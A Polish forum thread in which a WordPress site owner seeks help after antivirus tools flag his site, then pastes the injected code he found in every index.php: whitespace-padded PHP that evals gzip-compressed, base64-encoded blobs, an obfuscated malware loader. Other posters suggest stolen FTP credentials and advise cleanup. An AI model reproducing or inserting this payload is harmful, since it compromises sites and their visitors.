Jump to content
Sign in to follow this  
nightstalk3r

Proszę o pomoc przy zeskanowaniu bloga.

Recommended Posts

Witam, prowadze strone http://www.warcraft.net.pl/

 

Jakiś czas temu dostałem e-mail od google abym sprawdził pliki strony czy nie ma wirusa, sprawdziłem chyba wszystko co mi przyszło do głowy i nie znalazłem nic. Na wszelki wypadek wgrałem paczkę wordpressa na nowo na czysto. Dziś poinformował mnie ktoś o tym że kaspersky wykrywa wirus na stronie.

 

Czy możecie mi pomóc? Żaden skaner nawet online nie wykrywa mi tam wirusa/trojana.

Share this post


Link to post
Share on other sites

No coś tam masz...

 

http://www.warcraft.net.pl/	JS/TrojanDownloader.Iframe.NKI koń trojański	połączenie zostało zakończone - poddany kwarantannie	Wykryto zagrożenie podczas uzyskiwania dostępu do stron internetowych przez aplikację: C:\Program Files\Mozilla Firefox\firefox.exe.

Share this post


Link to post
Share on other sites
sprawdzcie teraz jeszcze raz prosze. W jednym pliku (ktore zreszta wczesniej tez skanowalem) mialem na koncu base64... itd. usunelem.

 

U mnie teraz jest OK.

Share this post


Link to post
Share on other sites
dzieki. czy mozliwe ze te gowno zostalo wrzucone przez rss czytnik ktory tam jest? innej mozliwosci raczej nie ma.

Zakładam, że przyczepiło się do pliku index lub .js więc to FTP lub "luki" w Wordpress

Share this post


Link to post
Share on other sites
Ja właśnie NOD-em sprawdzałem i siedzi cicho. Wcześniej wykrywał.

zeskanujcie jak mozecie raz jeszcze - po za tym ze w index.php stylu wczesniej gdzie usunelem, base 64 byl takze w index.php stylu domyslnego (co mnie w cholere dziwi). Tyle lat uzywam wp i nigdy jeszcze nic takiego mi sie nie przytrafilo.

 

 

 

																																																																								   <?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM=')));  eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J
1VBJjFbJjNW0rgUAqDUUxQ==')));  eval(gzuncompress(base64_decode('eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4
gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqA
vz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk
9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0
LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNY
P
kwhyM6zP7/hmmDAXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJG
osX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PI
mRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWw
RwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I='))); ?>

Edited by nightstalk3r

Share this post


Link to post
Share on other sites
cholerka.. w kazdym index.php to jest :)

 

A wiec stawiam na FTP. Zmień hasło do logowania FTP na serwer, nie wpisuj hasła na stałe do swojego klienta FTP tylko przy każdym połaczeniu je podawaj. Sprawdź wszystkie pliki o nazwie index oraz wszystkie pliki z rozszerzeniem .js

Share this post


Link to post
Share on other sites

Proszę o ponowny skan nod i kasperskiego. Wgrany caly skrypt od nowa ze strony producenta, wywalone stare pluginy, zostawione tylko to co najwazniejsze i sprawdzone. Sprawdzony chyba kazdy mozliwy js i index, powinno byc czysto :)

Share this post


Link to post
Share on other sites
Proszę o ponowny skan nod i kasperskiego. Wgrany caly skrypt od nowa ze strony producenta, wywalone stare pluginy, zostawione tylko to co najwazniejsze i sprawdzone. Sprawdzony chyba kazdy mozliwy js i index, powinno byc czysto :)

NOD ok.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×